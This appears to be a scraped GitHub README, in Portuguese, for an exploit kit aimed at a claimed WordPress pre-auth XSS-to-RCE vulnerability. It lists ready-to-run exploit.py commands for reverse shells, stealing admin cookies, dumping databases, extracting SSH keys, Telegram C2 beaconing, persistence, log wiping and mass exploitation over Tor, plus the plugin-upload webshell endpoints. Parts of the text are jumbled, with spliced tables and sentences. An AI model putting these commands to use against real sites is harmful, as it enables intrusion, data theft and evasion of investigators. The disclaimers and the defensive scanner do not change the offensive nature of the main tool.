
🛡️ CVE-2026-64638 - Suíte de Avaliação de Segurança para WordPress (CVSS 8.9) | Kit de pentest para WordPress 4.7.0-7.0.2. Inclui avaliação de vulnerabilidades e módulos de análise avançada. 🐍 Verificação Segura & Exploit, 2 modos. Kit Avançado Blue&Red Team Best 2026-64638, uso somente autorizado. Mantenha-se Legal <3zd

⚠️ APENAS USO ÉTICO – TESTE DE SEGURANÇA AUTORIZADO
Este repositório fornece ferramentas exclusivamente para profissionais de segurança autorizados, blue teams e pentesters.
O acesso não autorizado a sistemas informáticos é ilegal ao abrigo da CFAA (EUA), Computer Misuse Act (Reino Unido), TCK 243/244 (Turquia) e leis semelhantes em todo o mundo.
CVE‑2026‑64638 é uma vulnerabilidade crítica de XSS refletido pré-autenticação nas versões 4.7.0 a 7.0.2 do WordPress que permite a um atacante escalar um ataque de XSS para execução remota de código (RCE) total através do recurso Application Password.
strip_tags() do PHP e o wp_kses_post() do WordPress analisam tags HTML de forma diferente, permitindo que entrada maliciosa ultrapasse a sanitização.wp-login.php). Quando o login falha, o payload é refletido de volta e executado no navegador da vítima.| Ferramenta | Objetivo | Público-alvo |
|---|---|---|
exploit.py | Conjunto completo de exploração com reverse shell, persistência, C2, escalada de privilégios, análise forense de memória, dump da base de dados, extração de chaves SSH e varredura em massa. |
git clone https://github.com/tc4dy/CVE-2026-64638-PoC-Exploit
cd CVE-2026-64638-PoC-Exploit
pip install -r requirements.txt
requests
urllib3
#ops
pymysql
mysql-connector-python
PySocks
requests[socks]
exploit.pysafecheck.py| Endpoint | Finalidade |
|---|---|
/wp-login.php | Página de login – ponto de injeção de XSS |
Este software é fornecido apenas para fins educacionais e testes de segurança autorizados.
| Red teams / pentesters autorizados |
safecheck.py | Verificador de vulnerabilidades não intrusivo que deteta a reflexão de XSS e avalia a postura de segurança sem executar qualquer payload malicioso. Gera relatórios detalhados. | Blue teams / auditores de segurança |
| Recurso | exploit.py | safecheck.py |
|---|
| Deteção de vulnerabilidades | ✅ | ✅ |
| Deteção da versão do WordPress | ✅ | ✅ |
| Deteção de reflexão de XSS | ✅ | ✅ |
| Captura de Application Password | ✅ | ❌ |
| Upload de plugin (RCE) | ✅ | ❌ |
| Reverse shell | ✅ | ❌ |
| Beaconing C2 (HTTP/DNS/Telegram) | ✅ | ❌ |
| Escalada de privilégios | ✅ | ❌ |
| Análise forense de memória | ✅ | ❌ |
| Dump da base de dados | ✅ | ❌ |
| Extração de chaves SSH | ✅ | ❌ |
| Métodos de persistência | ✅ | ❌ |
| Auditoria de cabeçalhos de segurança | ❌ | ✅ |
| Verificação de exposição de ficheiros de configuração | ❌ | ✅ |
| Verificação de listagem de diretórios | ❌ | ✅ |
| Verificação de exposição do phpinfo | ❌ | ✅ |
| Varredura em massa | ✅ | ✅ |
| Suporte a proxy | ✅ | ✅ |
| Suporte a Tor | ✅ | ✅ |
| Tunelamento Ngrok | ✅ | ❌ |
| Shell interativo | ✅ | ❌ |
| Modo não intrusivo (seguro) | ❌ | ✅ |
| Saída JSON / relatório | ✅ | ✅ |
| Cenário | Ferramenta Recomendada |
|---|
| Blue Team – verificar se a sua instalação do WordPress está vulnerável | safecheck.py |
| Auditoria de Segurança – avaliação não intrusiva de vulnerabilidades | safecheck.py |
| Red Team – testes de penetração autorizados com exploração total | exploit.py |
| Bug Bounty – teste de divulgação responsável | safecheck.py |
| Varredura em Massa – verificar vários alvos quanto a vulnerabilidade | exploit.py ou safecheck.py |
| Resposta a Incidentes – verificar se os sistemas estão comprometidos | safecheck.py |
| Pós-Exploração Avançada – persistência, C2, forense | exploit.py |
| Parâmetro | Descrição |
|---|
-t, --target | URL do WordPress alvo (ex.: https://wordpress-site.com) |
-l, --list | Ficheiro contendo lista de alvos (um por linha) para varredura em massa |
--lhost | Endereço IP local para callbacks de reverse shell |
--lport | Porta local para reverse shell (padrão: 4444) |
--proxy | Proxy HTTP/HTTPS (ex.: http://127.0.0.1:8080) |
--timeout | Timeout do pedido em segundos (padrão: 10) |
--retry | Número de tentativas (padrão: 3) |
--threads | Número de threads para varredura em massa (padrão: 5) |
--exploit | Explorar automaticamente alvos vulneráveis durante a varredura em massa |
--ngrok-token | Authtoken do Ngrok para tunelamento externo |
--payload-type | Tipo de payload XSS: reflected, dom_based, waf_bypass, case_manipulation, double_encoded |
--session-hijack | Ativar sequestro de sessão (roubar cookies de administrador) |
--dump-db | Despejar a base de dados do WordPress (requer pymysql) |
--extract-ssh | Extrair chaves SSH do sistema alvo |
--tor | Encaminhar tráfego através do Tor (socks5h://127.0.0.1:9050) |
--stealth | Ativar modo stealth (spoofar cabeçalhos, atrasar pedidos) |
--no-cleanup | Ignorar limpeza de logs após a exploração |
--ssl-verify | Verificar certificados SSL |
--c2-type | Tipo de C2: http, dns, telegram |
--c2-server | URL do servidor C2 ou token do bot do Telegram |
--auto-priv-esc | Escalada automática de privilégios após a shell |
--memory-forensics | Ativar módulo de análise forense de memória |
-v, --verbose | Saída detalhada |
-q, --quiet | Modo silencioso (saída mínima) |
| Parâmetro | Descrição |
|---|
-t, --target | URL do WordPress alvo (ex.: https://wordpress-site.com) |
-l, --list | Ficheiro contendo lista de alvos (um por linha) para varredura em massa |
--timeout | Timeout do pedido em segundos (padrão: 10) |
--retry | Número de tentativas (padrão: 3) |
--threads | Número de threads para varredura em massa (padrão: 5) |
--proxy | Proxy HTTP/HTTPS (ex.: http://127.0.0.1:8080) |
--tor | Encaminhar tráfego através do Tor (socks5h://127.0.0.1:9050) |
--ssl-verify | Verificar certificados SSL |
--output | Ficheiro de relatório JSON de saída |
-v, --verbose | Saída detalhada |
-q, --quiet | Modo silencioso (saída mínima) |
| # | Cenário | Comando |
|---|
| 1 | Verificação rápida de vulnerabilidade | python safecheck.py -t https://wordpress-site.com |
| 2 | Varredura detalhada com relatório | python safecheck.py -t https://wordpress-site.com --output report.json -v |
| 3 | Exploração total com reverse shell | python exploit.py -t https://wordpress-site.com --lhost 192.168.1.100 --exploit |
| 4 | Usar payload XSS personalizado | python exploit.py -t https://wordpress-site.com --payload-type waf_bypass |
| 5 | Sequestro de sessão (roubar cookies de administrador) | python exploit.py -t https://wordpress-site.com --session-hijack |
| 6 | Despejar a base de dados do WordPress | python exploit.py -t https://wordpress-site.com --dump-db |
| 7 | Extrair chaves SSH | python exploit.py -t https://wordpress-site.com --extract-ssh |
| 8 | Usar Tor para anonimato | python exploit.py -t https://wordpress-site.com --tor --stealth |
| 9 | Beaconing C2 com Telegram | python exploit.py -t https://wordpress-site.com --c2-type telegram --c2-server "https://api.telegram.org/botTOKEN/chat_id" |
| 10 | Varredura em massa a partir de ficheiro | python exploit.py -l targets.txt --threads 10 --exploit |
| 11 | Análise forense de memória após a shell | python exploit.py -t https://wordpress-site.com --memory-forensics |
| 12 | Escalada automática de privilégios | python exploit.py -t https://wordpress-site.com --auto-priv-esc |
| 13 | Shell interativo | python exploit.py -t https://wordpress-site.com -i |
| 14 | Tunelamento Ngrok | python exploit.py -t https://wordpress-site.com --ngrok-token YOUR_TOKEN |
| Comando | Descrição |
|---|
reverse | Iniciar listener de reverse shell |
persist | Aplicar métodos de persistência (cron, systemd, rc.local, SSH, WP) |
clean | Limpar logs e histórico do sistema |
dumpdb | Despejar a base de dados do WordPress |
ssh | Extrair chaves SSH |
priv | Escalada automática de privilégios |
mem | Executar análise forense de memória |
c2 | Mostrar estado do C2 |
c2task | Verificar tarefas do C2 |
exit | Sair do shell interativo |
/wp-admin/authorize-application.php| Geração de Application Password |
/wp-admin/update.php?action=upload-plugin | Upload de plugin (RCE) |
/wp-content/plugins/{slug}/{slug}.php | Execução de webshell |
| País | Lei Relevante |
|---|
| Estados Unidos | Computer Fraud and Abuse Act (CFAA) – 18 U.S.C. § 1030 |
| Reino Unido | Computer Misuse Act 1990 |
| Turquia | TCK 243 (Acesso Não Autorizado), TCK 244 (Interferência no Sistema) |
| Alemanha | StGB § 202a (Espionagem de Dados), § 202b (Interceção de Dados) |
| França | Loi Godfrain – Article 323-1 |
| Austrália | Cybercrime Act 2001 |
| Canadá | Código Penal – Secção 342.1 |
| Índia | Information Technology Act 2000 – Secções 43, 66 |
| Japão | Lei sobre a Proibição do Acesso Não Autorizado a Computadores |